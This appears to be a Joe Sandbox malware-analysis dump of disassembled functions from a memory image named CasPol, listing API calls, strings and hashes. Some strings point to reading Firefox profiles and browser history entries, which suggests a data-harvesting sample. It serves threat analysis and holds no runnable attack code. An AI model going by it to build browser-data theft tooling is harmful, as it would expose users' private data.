                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                • API String ID: 2080319088-3046471546
                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                Strings
                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                • API String ID: 4111938811-1819279800
                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                • String ID:
                                                                                                • API String ID: 829165378-0
                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                • API String ID: 2454223109-1580313836
                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                APIs
                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                • API String ID: 4054529287-3175352466
                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                • API String ID: 2000436516-3842416460
                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                APIs
                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                • API String ID: 3849927982-2252543386
                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                • String ID: ---
                                                                                                • API String ID: 3437578500-2854292027
                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 1700100422-0
                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                • String ID:
                                                                                                • API String ID: 552707033-0
                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                • String ID: 4$h
                                                                                                • API String ID: 4066021378-1856150674
                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                • String ID: A
                                                                                                • API String ID: 2892645895-3554254475
                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                • String ID: 0$6
                                                                                                • API String ID: 4066108131-3849865405
                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 290601579-0
                                                                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                • String ID: %s (%s)$YV@
